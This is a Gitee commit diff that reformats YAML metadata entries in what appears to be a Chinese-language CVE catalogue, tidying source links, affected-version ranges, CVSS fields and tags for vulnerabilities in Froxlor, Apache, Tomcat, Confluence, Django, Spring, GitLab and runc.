Pre Merge pull request !450 from Re3et/master
This commit is contained in:
Re3et
Gitee
commit
93b9899123
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2021-42325
|
||||
source:
|
||||
https://www.exploit-db.com/exploits/50502
|
||||
source: https://www.exploit-db.com/exploits/50502
|
||||
info:
|
||||
name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
|
||||
severity: high
|
||||
|
|
@ -8,7 +7,7 @@ info:
|
|||
Froxlor是Froxlor团队的一套轻量级服务器管理软件。
|
||||
Froxlor存在安全漏洞,该漏洞允许在数据库管理器DbManagerMySQL.php中通过自定义数据库名称注入SQL。
|
||||
scope-of-influence:
|
||||
Froxlor 0.9~0.10.30
|
||||
0.9 < Froxlor < 0.10.30
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42325
|
||||
- https://avd.aliyun.com/detail?id=AVD-2021-42325
|
||||
|
|
|
|||
|
|
@ -1,13 +1,12 @@
|
|||
id: CVE-2023-0315
|
||||
source:
|
||||
https://github.com/mhaskar/CVE-2023-0315
|
||||
source: https://github.com/mhaskar/CVE-2023-0315
|
||||
info:
|
||||
name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
|
||||
severity: high
|
||||
description: |
|
||||
Froxlor 2.0.8 之前的版本存在远程代码执行漏洞。攻击者可以在未经身份验证的情况下利用这个漏洞在OS级别执行任意代码。
|
||||
scope-of-influence:
|
||||
Froxlor 2.0.8 之前的版本
|
||||
Froxlor < 2.0.8
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2023-0315
|
||||
- https://github.com/froxlor/froxlor/commit/090cfc26f2722ac3036cc7fd1861955bc36f065a
|
||||
|
|
|
|||
|
|
@ -1,13 +1,12 @@
|
|||
id: CVE-2023-0877
|
||||
source:
|
||||
https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
|
||||
source: https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
|
||||
info:
|
||||
name: Froxlor是一款易于使用且功能强大的服务器管理面板,用于管理各种主机和域名服务。
|
||||
severity: high
|
||||
description: |
|
||||
Code Injection in GitHub repository froxlor/froxlor prior to 2.0.11.
|
||||
scope-of-influence:
|
||||
Froxlor before 2.0.8
|
||||
Froxlor < 2.0.8
|
||||
reference:
|
||||
- https://github.com/blakduk/Advisories
|
||||
- https://huntr.dev/bounties/b29cf038-06f1-4fb0-9437-08f2991f92a8/
|
||||
|
|
|
|||
|
|
@ -10,7 +10,7 @@ info:
|
|||
reference:
|
||||
- https://grafana.com/blog/2021/12/08/an-update-on-0day-cve-2021-43798-grafana-directory-traversal/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2021-43798
|
||||
cwe-id: CWE-22
|
||||
|
|
|
|||
|
|
@ -4,9 +4,9 @@ info:
|
|||
name: InfluxDB 1.7.6之前版本中的services/httpd/handler.go中的authenticate函数存在认证绕过漏洞。该漏洞源于JWT令牌可能具有空SharedSecret。攻击者可利用该漏洞绕过认证。
|
||||
severity: critical
|
||||
description: |
|
||||
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
|
||||
InfluxDB before 1.7.6 has an authentication bypass vulnerability in the authenticate function in services/httpd/handler.go because a JWT token may have an empty SharedSecret (aka shared secret).
|
||||
scope-of-influence:
|
||||
InfluxData InfluxDB <1.7.6
|
||||
InfluxData InfluxDB < 1.7.6
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-20933
|
||||
classification:
|
||||
|
|
|
|||
|
|
@ -4,7 +4,9 @@ info:
|
|||
name: Java SE(Java Standard Edition,Java 标准版)是Java技术的核心和基础,是Java ME和Java EE编程的基础。Java SE是Java程序设计语言和Java平台的总称。
|
||||
severity: high
|
||||
description: Oracle Java SE(组件:库)中存在漏洞。易被利用的漏洞允许未经身份验证的攻击者通过多种协议进行网络访问,从而危害Oracle Java SE、Oracle GraalVM Enterprise Edition。成功攻击此漏洞会导致对关键数据或所有Oracle Java SE、Oracle GraalVM Enterprise Edition可访问数据进行未经授权的创建、删除或修改访问。
|
||||
scope-of-influence: Oracle Java SE:17.0.2和18;Oracle GraalVM企业版:21.3.1和22.0.0.2
|
||||
scope-of-influence:
|
||||
Oracle Java SE:17.0.2和18
|
||||
Oracle GraalVM企业版:21.3.1和22.0.0.2
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21449
|
||||
- https://security.netapp.com/advisory/ntap-20220429-0006/
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2019-8942
|
||||
source:
|
||||
https://github.com/synacktiv/CVE-2019-8942
|
||||
source: https://github.com/synacktiv/CVE-2019-8942
|
||||
info:
|
||||
name: WordPress是一款免费开源的内容管理系统(CMS),目前已经成为全球使用最多的CMS建站程序。
|
||||
severity: high
|
||||
|
|
|
|||
|
|
@ -233,4 +233,4 @@ The available modes are:
|
|||
|
||||
args = p.parse_args()
|
||||
|
||||
main(args)
|
||||
main(args)
|
||||
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://apisix.apache.org/zh/docs/apisix/plugins/batch-requests
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.80
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-24112
|
||||
cwe-id: CWE-290
|
||||
cnvd-id: None
|
||||
|
|
|
|||
|
|
@ -8,8 +8,8 @@ info:
|
|||
scope-of-influence:
|
||||
apache-CouchDB < 3.2.2
|
||||
reference:
|
||||
- http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-...
|
||||
- http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code...
|
||||
- http://packetstormsecurity.com/files/167032/Apache-CouchDB-3.2.1-Remote-Code-Execution.html
|
||||
- http://packetstormsecurity.com/files/169702/Apache-CouchDB-Erlang-Remote-Code-Execution.html
|
||||
- http://www.openwall.com/lists/oss-security/2022/04/26/1
|
||||
- http://www.openwall.com/lists/oss-security/2022/05/09/1
|
||||
- http://www.openwall.com/lists/oss-security/2022/05/09/2
|
||||
|
|
@ -17,7 +17,7 @@ info:
|
|||
- http://www.openwall.com/lists/oss-security/2022/05/09/4
|
||||
- https://docs.couchdb.org/en/3.2.2/setup/cluster.html
|
||||
- https://lists.apache.org/thread/w24wo0h8nlctfps65txvk0oc5hdcnv00
|
||||
- https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-setti...
|
||||
- https://medium.com/@_sadshade/couchdb-erlang-and-cookies-rce-on-default-settings-b1e9173a4bcd
|
||||
- https://www.openwall.com/lists/oss-security/2022/04/26/1
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
|
|
@ -26,7 +26,4 @@ info:
|
|||
cwe-id: CWE-1188
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 不安全的默认资源初始化
|
||||
- 弱口令要求
|
||||
- 远程代码执行
|
||||
tags: 不安全的默认资源初始化, 弱口令要求, 远程代码执行
|
||||
|
|
@ -12,7 +12,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2019-17564
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2019-17564
|
||||
cwe-id: CWE-502
|
||||
|
|
|
|||
|
|
@ -11,7 +11,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-25641
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-25641
|
||||
cwe-id: CWE-502
|
||||
|
|
|
|||
|
|
@ -11,7 +11,7 @@ info:
|
|||
- https://help.aliyun.com/document_detail/390193.html
|
||||
- https://lists.apache.org/thread/1mszxrvp90y01xob56yp002939c7hlww
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-43297
|
||||
cwe-id: CWE-502
|
||||
|
|
|
|||
|
|
@ -8,11 +8,10 @@ info:
|
|||
description: |
|
||||
Apache HTTP Server 2.4.20版本至2.4.43版本中存在安全漏洞,攻击者可借助‘Cache-Digest’标头中带有特制值的HTTP/2请求利用该漏洞造成Push Diary崩溃。
|
||||
scope-of-influence:
|
||||
Apache HTTP = 2.4.20-2.4.43
|
||||
2.4.20 ≤ Apache HTTP ≤ 2.4.43
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2020-9490
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html#CVE-2020-9490
|
||||
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
|
|
|
|||
|
|
@ -17,4 +17,4 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,Apache,目录遍历
|
||||
tags: cve2021, Apache, 目录遍历
|
||||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
Apache HTTP Server 2.4.50版本中对CVE-2021-41773修复不够完善,攻击者可利用该漏洞绕过修复补丁,并利用目录穿越攻击访问服务器中一些文件,进而造成敏感信息泄露。若httpd中开启CGI功能,攻击者可以构造恶意请求,造成远程代码执行。
|
||||
scope-of-influence:
|
||||
Apache HTTP = 2.4.49, Apache HTTP = 2.4.50
|
||||
2.4.49 ≤ Apache HTTP ≤ 2.4.50
|
||||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2021-42013
|
||||
- https://httpd.apache.org/security/vulnerabilities_24.html
|
||||
|
|
@ -17,4 +17,4 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,Apache,目录遍历,RCE
|
||||
tags: cve2021, Apache, 目录遍历, RCE
|
||||
|
|
@ -5,7 +5,6 @@ info:
|
|||
severity: critical
|
||||
description:
|
||||
CVE-2021-26295漏洞由RMI反序列化造成的远程代码执行漏洞,攻击者可构造恶意请求,触发反序列化,从而造成任意代码执行,控制服务器。
|
||||
|
||||
scope-of-influence:
|
||||
Apache OFBiz < 17.12.06
|
||||
reference:
|
||||
|
|
|
|||
|
|
@ -6,7 +6,7 @@ info:
|
|||
description: |
|
||||
在Apache Shiro中,RegexRequestMatcher可以被错误配置为在某些servlet容器上被绕过。应用程序使用RegExPatternMatcher和正则表达式中的'.'可能容易受到旁路授权的攻击。
|
||||
scope-of-influence:
|
||||
Apache Shiro 1.9.1之前
|
||||
Apache Shiro < 1.9.1
|
||||
reference:
|
||||
- https://lists.apache.org/thread/y8260dw8vbm99oq7zv6y3mzn5ovk90xh
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-32532
|
||||
|
|
@ -14,10 +14,10 @@ info:
|
|||
- https://cxsecurity.com/cveshow/CVE-2022-32532/
|
||||
- https://vigilance.fr/vulnerability/Oracle-Fusion-Middleware-vulnerabilities-of-October-2022-39612
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-32532
|
||||
cwe-id: CWE-863
|
||||
cnvd-id: CNNVD-202206-2750
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: 旁路授权
|
||||
|
|
@ -16,5 +16,4 @@ info:
|
|||
cwe-id: CWE-502
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 远程命令执行
|
||||
tags: 远程命令执行
|
||||
|
|
@ -16,5 +16,4 @@ info:
|
|||
cwe-id: CWE-20
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 远程命令执行
|
||||
tags: 远程命令执行
|
||||
|
|
@ -20,5 +20,4 @@ info:
|
|||
cwe-id: CWE-1321
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags:
|
||||
- 远程命令执行
|
||||
tags: 远程命令执行
|
||||
|
|
|
|||
|
|
@ -2,7 +2,7 @@ id: CVE-2021-27905
|
|||
source: https://github.com/Henry4E36/Solr-SSRF
|
||||
info:
|
||||
name: Apache Solr是美国阿帕奇(Apache)基金会的一款基于Lucene(一款全文搜索引擎)的搜索服务器。该产品支持层面搜索、垂直搜索、高亮显示搜索结果等。
|
||||
severity: high
|
||||
severity: Critical
|
||||
description:
|
||||
Apache Solr 8.8.2之前版本存在代码问题漏洞,攻击者可利用masterUrl参数将索引数据复制到本地内核中。
|
||||
scope-of-influence:
|
||||
|
|
@ -11,9 +11,10 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2021-27905
|
||||
- https://security.netapp.com/advisory/ntap-20210611-0009/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 8.1
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2021-27905
|
||||
cnvd-id: CNNVD-202104-914
|
||||
cwe-id: CWE-918
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2021,Apache,Solr,SSRF
|
||||
tags: cve2021, Apache, Solr, SSRF
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@ info:
|
|||
- https://blog.redteam-pentesting.de/2020/websocket-vulnerability-tomcat/
|
||||
- https://lists.apache.org/thread.html/rd48c72bd3255bda87564d4da3791517c074d94f8a701f93b85752651%40%3Cannounce.tomcat.apache.org%3E
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-13935
|
||||
cwe-id: CWE-835
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-1938
|
||||
source: https://github.com/Hancheng-Lei/Hacking-Vulnerability-CVE-2020-1938-Ghostcat
|
||||
info:
|
||||
name: Java 是目前 Web 开发中主流的编程语言,而 Tomcat 是当前流行的 Java 中间件服务器之一,从初版发布到现在已经有二十多年历史,在世界范围内广泛使用。
|
||||
name: Apache Tomcat是美国阿帕奇(Apache)软件基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
|
||||
severity: critical
|
||||
description:
|
||||
Ghostcat(幽灵猫) 是由长亭科技安全研究员发现的存在于 Tomcat 中的安全漏洞,由于 Tomcat AJP 协议设计上存在缺陷,攻击者通过 Tomcat AJP Connector 可以读取或包含 Tomcat 上所有 webapp 目录下的任意文件,例如可以读取 webapp 配置文件或源代码。此外在目标应用有文件上传功能的情况下,配合文件包含的利用还可以达到远程代码执行的危害。
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2020-9484
|
||||
source: https://github.com/RepublicR0K/CVE-2020-9484
|
||||
info:
|
||||
name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
|
||||
name: Apache Tomcat 是一个开放源代码、运行servlet和JSP Web应用软件的基于Java的Web应用软件容器。
|
||||
severity: high
|
||||
description:
|
||||
当Tomcat使用了自带session同步功能时,使用不安全的配置(没有使用EncryptInterceptor)会存在反序列化漏洞,攻击者通过精心构造的数据包, 可以对使用了自带session同步功能的Tomcat服务器进行攻击。
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2022-29885
|
||||
source: https://github.com/quynhlab/CVE-2022-29885
|
||||
info:
|
||||
name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。Apache Tomcat存在资源管理错误漏洞。攻击者利用该漏洞通过 EncryptInterceptor 导致 Apache Tomcat 过载,从而触发拒绝服务。
|
||||
name: Apache Tomcat是美国阿帕奇(Apache)基金会的一款轻量级Web应用服务器。该程序实现了对Servlet和JavaServer Page(JSP)的支持。
|
||||
severity: high
|
||||
description:
|
||||
当Tomcat开启集群配置,且通过NioReceiver通信时,无论服务端是否配置EncryptInterceptor,攻击者均可构造特制请求导致目标服务器拒绝服务。
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2020-13942
|
||||
source:
|
||||
None
|
||||
source: None
|
||||
info:
|
||||
name: Apache Unomi 是一个基于标准的客户数据平台(CDP,Customer Data Platform),用于管理在线客户和访客等信息,以提供符合访客隐私规则的个性化体验,比如 GDPR 和“不跟踪”偏好设置。其最初于 Jahia 开发,2015 年 10 月提交给了 Apache 孵化器。
|
||||
severity: critical
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2019-3394
|
||||
source:
|
||||
none
|
||||
source: none
|
||||
info:
|
||||
name: Atlassian Confluence Server是澳大利亚Atlassian公司的一套专业的企业知识管理与协同软件,也可以用于构建企业WiKi。Confluence Data Center是Confluence Center的数据中心版本。
|
||||
severity: high
|
||||
|
|
|
|||
|
|
@ -1,5 +1,5 @@
|
|||
id: CVE-2019-3396
|
||||
source:
|
||||
source: https://github.com/Yt1g3r/CVE-2019-3396_EXP
|
||||
info:
|
||||
name: Confluence是一个专业的企业知识管理与协同软件,可用于构建企业wiki。
|
||||
severity: critical
|
||||
|
|
@ -20,4 +20,4 @@ info:
|
|||
cwe-id: CWE-22
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2019,任意文件读取
|
||||
tags: RCE, cve2019, 任意文件读取
|
||||
|
|
@ -47,4 +47,4 @@ info:
|
|||
cwe-id: CWE-74
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2021,OGNI注入
|
||||
tags: RCE, cve2021, OGNI注入
|
||||
|
|
@ -24,4 +24,4 @@ info:
|
|||
cwe-id: CWE-74
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2022
|
||||
tags: RCE, cve2022
|
||||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-26138
|
||||
source:
|
||||
https://github.com/shavchen/CVE-2022-26138
|
||||
source: https://github.com/shavchen/CVE-2022-26138
|
||||
info:
|
||||
name: Confluence是atlassian公司的产品,是一个专业的企业知识管理与协同软件,也可以用于构建企业wiki。
|
||||
severity: critical
|
||||
|
|
@ -20,4 +19,4 @@ info:
|
|||
cwe-id: CWE-798
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2022
|
||||
tags: RCE, cve2022
|
||||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2021-31542
|
||||
source:
|
||||
https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md
|
||||
source: https://github.com/coffeehb/Some-PoC-oR-ExP/blob/master/Django/CVE-2021-31542.md
|
||||
info:
|
||||
name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。
|
||||
severity: high
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-28346
|
||||
source:
|
||||
https://github.com/DeEpinGh0st/CVE-2022-28346
|
||||
source: https://github.com/DeEpinGh0st/CVE-2022-28346
|
||||
info:
|
||||
name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。
|
||||
severity: critical
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-34265
|
||||
source:
|
||||
https://github.com/aeyesec/CVE-2022-34265
|
||||
source: https://github.com/aeyesec/CVE-2022-34265
|
||||
info:
|
||||
name: Django 是一个高级的 Python 网络框架,可以快速开发安全和可维护的网站。由经验丰富的开发者构建,Django 负责处理网站开发中麻烦的部分,因此你可以专注于编写应用程序,而无需重新开发。 它是免费和开源的,有活跃繁荣的社区,丰富的文档,以及很多免费和付费的解决方案。
|
||||
severity: critical
|
||||
|
|
|
|||
|
|
@ -1,7 +1,7 @@
|
|||
id: CVE-2019-16884
|
||||
source: https://github.com/teamssix/TWiki/blob/c0252efe2cca4b9f750b921ce390af0d9667aca8/docs/CloudNative/Docker/CVE-2019-16884.md
|
||||
info:
|
||||
name: Linux kernel is the kernel used by Linux Foundation's open source operating system Linux.
|
||||
name: Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。
|
||||
severity: high
|
||||
description: |
|
||||
runc through 1.0.0-rc8, as used in Docker through 19.03.2-ce and other products, allows AppArmor restriction bypass because libcontainer/rootfs_linux.go incorrectly checks mount targets, and thus a malicious Docker image can mount over a /proc directory
|
||||
|
|
@ -12,11 +12,11 @@ info:
|
|||
Red Hat OpenShift Container Platform 4.2
|
||||
Red Hat OpenShift Container Platform 3.9
|
||||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
|
||||
- https://usn.ubuntu.com/usn/usn-4297-1
|
||||
- https://security.netapp.com/advisory/ntap-20220221-0004/
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16884
|
||||
- https://usn.ubuntu.com/usn/usn-4297-1
|
||||
- https://security.netapp.com/advisory/ntap-20220221-0004/
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2019-16884
|
||||
cwe-id: CWE-863
|
||||
|
|
@ -10,7 +10,7 @@ info:
|
|||
RunC version <=1.0-rc6
|
||||
reference:
|
||||
- https://www.4hou.com/vulnerable/16361.html
|
||||
- https://github.com/Frichetten/CVE-2019-5736-PoC\
|
||||
- https://github.com/Frichetten/CVE-2019-5736-PoC
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H
|
||||
cvss-score: 8.6
|
||||
|
|
@ -18,4 +18,4 @@ info:
|
|||
cwe-id: CWE-78
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: cve2019,docker.runc
|
||||
tags: cve2019, docker.runc
|
||||
|
|
@ -19,7 +19,7 @@ info:
|
|||
- https://www.fortiguard.com/psirt/FG-IR-22-300
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-39952
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-39952
|
||||
cwe-id: CWE-610
|
||||
|
|
|
|||
|
|
@ -19,4 +19,4 @@ info:
|
|||
cwe-id: CWE-94
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: RCE,cve2021,gitlab
|
||||
tags: RCE, cve2021, gitlab
|
||||
|
|
@ -14,7 +14,7 @@ info:
|
|||
- https://www.tenable.com/plugins/nessus/152483
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-22214
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
|
||||
cvss-score: 8.6
|
||||
cve-id: CVE-2021-22214
|
||||
cwe-id: CWE-918
|
||||
|
|
|
|||
|
|
@ -19,4 +19,4 @@ info:
|
|||
cwe-id: CWE-798
|
||||
cnvd-id: None
|
||||
kve-id: None
|
||||
tags: UseOfHardCodedPassword,cve2022,gitlab
|
||||
tags: UseOfHardCodedPassword, cve2022, gitlab
|
||||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2022-22978
|
||||
source:
|
||||
https://github.com/DeEpinGh0st/CVE-2022-22978
|
||||
source: https://github.com/DeEpinGh0st/CVE-2022-22978
|
||||
info:
|
||||
name: Spring Security是一个能够为基于Spring的企业应用系统提供声明式的安全访问控制解决方案的安全框架。
|
||||
severity: critical
|
||||
|
|
@ -13,7 +12,7 @@ info:
|
|||
reference:
|
||||
- https://nvd.nist.gov/vuln/detail/CVE-2022-22978
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2022-22978
|
||||
cwe-id: CWE-863, CWE-285
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2017-8046
|
||||
source:
|
||||
https://github.com/m3ssap0/spring-break_cve-2017-8046
|
||||
source: https://github.com/m3ssap0/spring-break_cve-2017-8046
|
||||
info:
|
||||
name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。
|
||||
severity: high
|
||||
|
|
@ -12,7 +11,7 @@ info:
|
|||
reference:
|
||||
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-8046
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
|
||||
cvss-score: 9.8
|
||||
cve-id: CVE-2017-8046
|
||||
cwe-id: CWE-20
|
||||
|
|
|
|||
|
|
@ -1,6 +1,5 @@
|
|||
id: CVE-2020-5398
|
||||
source:
|
||||
https://github.com/motikan2010/CVE-2020-5398
|
||||
source: https://github.com/motikan2010/CVE-2020-5398
|
||||
info:
|
||||
name: Spring框架是 Java 平台的一个开源的全栈(full-stack)应用程序框架和控制反转容器实现,一般被直接称为 Spring。
|
||||
severity: high
|
||||
|
|
@ -14,7 +13,7 @@ info:
|
|||
- https://nvd.nist.gov/vuln/detail/CVE-2020-5398
|
||||
- https://pivotal.io/security/cve-2020-5398
|
||||
classification:
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H
|
||||
cvss-score: 7.5
|
||||
cve-id: CVE-2020-5398
|
||||
cwe-id: CWE-494, CWE-79
|
||||
|
|
|
|||
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
|
||||
severity: critical
|
||||
description: Spring Cloud Function是基于 Spring Boot 的函数框架。由于 Spring Cloud Function 对用户输入的参数安全处理不严,未授权的攻击者可构造特定的数据包,通过特定的 HTTP 请求头进行 SpEL 表达式注入攻击,从而可执行任意的恶意 Java 代码,获取服务权限。
|
||||
scope-of-influence: Spring Cloud Function<3.1.7
|
||||
scope-of-influence:
|
||||
Spring Cloud Function<3.1.7
|
||||
reference:
|
||||
- https://github.com/dinosn/CVE-2022-22963
|
||||
- https://avd.aliyun.com/search?q=CVE-2022-22963
|
||||
|
|
|
|||
|
|
@ -4,7 +4,8 @@ info:
|
|||
name: Spring Framework是美国Spring团队的一套开源的Java、JavaEE应用程序框架。该框架可帮助开发人员构建高质量的应用。
|
||||
severity: critical
|
||||
